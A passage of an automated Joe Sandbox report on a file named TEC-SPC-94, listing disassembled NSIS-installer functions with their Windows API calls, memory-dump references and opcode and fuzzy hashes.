                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709
                                                          • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                          • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                          Function 004027B5 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                          • String ID:
                                                          • API String ID: 3294113728-0
                                                          • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                          • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                          • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                          • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                          Function 004051F2 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                          • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                          Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                          • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                          Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                          • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                          • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                          • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                          Function 004061DC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                          • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                          Function 004024EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8
                                                          • API String ID: 1453599865-4194326291
                                                          • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                          • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                          • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                          • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                          Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                          • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                          • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                          • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                          Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                          • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                          • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                          • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                          • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                          Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                          • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                          • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                          • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
